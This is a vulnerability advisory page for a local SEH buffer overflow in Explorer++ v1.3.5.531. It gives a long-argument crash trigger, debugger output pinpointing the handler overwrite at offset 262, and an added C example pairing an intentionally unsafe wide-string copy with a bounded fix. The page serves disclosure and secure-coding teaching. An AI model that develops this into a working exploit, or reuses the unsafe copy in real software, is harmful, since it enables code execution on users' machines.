Exploits / Vulnerability Discovered : 2023-03-27 |
Type : local |
Platform : windows
This exploit / vulnerability (Explorer32++ v1.3.5.531 buffer overflow) is for educational purposes only; if it is used, you do so at your own risk!
[+] Code ...
# Exploit Title: Explorer32++ - Buffer overflow
# Discovery by: Rafael Pedrero
# Discovery Date: 2022-01-09
# Vendor Homepage: http://www.explorerplusplus.com/
# Software Link : http://www.explorerplusplus.com/
# Tested Version:
# Tested on: Windows 10
A buffer overflow that overwrites the Structured Exception Handler (SEH) records
in Explorer++ v1.3.5.531, and possibly other versions, may allow attackers
to execute arbitrary code via a long file name argument.
Proof of concept:
Run Explorer32++.exe from the command line with a long string (more than
396 characters) as its argument. The debugger then shows the following:
SEH chain of main thread
Address SE handler
0018FB14 00690041
00370069 *** CORRUPT ENTRY ***
0BADF00D [+] Examining SEH chain
0BADF00D SEH record (nseh field) at 0x0018fb14 overwritten with
unicode pattern : 0x00370069 (offset 262), followed by 626 bytes of cyclic
data after the handler
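To show the defect class behind this crash, here is an added illustrative C example (it is not Explorer++ source, which this page does not contain): a hypothetical unbounded wide-character copy of a command-line path into a fixed-size stack buffer, beside a bounded version that rejects over-long input. The 260-character buffer size and the function names are assumptions.

```c
#include <stddef.h>
#include <string.h>
#include <wchar.h>

/* Assumed buffer size for illustration (MAX_PATH on Windows is 260). */
#define PATH_BUF_CHARS 260

/* Vulnerable pattern (reconstruction, not Explorer++ source): the file-name
 * argument is copied into a fixed-size stack buffer without a length check.
 * On 32-bit Windows the thread's SEH registration records sit on the stack
 * above the locals, so an argument longer than the buffer runs into the
 * nSEH/handler pair, which is the corrupted entry the debugger output above
 * reports. Shown only to contrast with the hardened form below. */
void open_path_unsafe(const wchar_t *arg)
{
    wchar_t path[PATH_BUF_CHARS];
    wcscpy(path, arg);        /* unbounded copy: overflows when wcslen(arg) >= 260 */
    (void)path;
}

/* Hardened form: check the length before copying and refuse over-long input
 * rather than truncating silently. Returns 0 on success, -1 on bad input. */
int open_path_safe(const wchar_t *arg, wchar_t *out, size_t out_chars)
{
    size_t n;
    if (arg == NULL || out == NULL || out_chars == 0)
        return -1;
    n = wcslen(arg);
    if (n >= out_chars)       /* must leave room for the L'\0' terminator */
        return -1;
    memcpy(out, arg, (n + 1) * sizeof(wchar_t));
    return 0;
}

/* Build a constructed argument of `len` repeated characters and run the safe
 * copy into a PATH_BUF_CHARS buffer; returns open_path_safe's result. */
int try_open(size_t len)
{
    static wchar_t arg[1024];
    wchar_t path[PATH_BUF_CHARS];
    size_t i;
    if (len >= sizeof(arg) / sizeof(arg[0]))
        return -1;
    for (i = 0; i < len; i++)
        arg[i] = L'A';
    arg[len] = L'\0';
    return open_path_safe(arg, path, PATH_BUF_CHARS);
}
```

Calling `try_open(400)` (longer than the 396 characters the advisory says trigger the crash) returns -1 without touching the stack beyond the buffer; on Windows builds, /GS, /SAFESEH and DEP add defence in depth but do not replace the bound check.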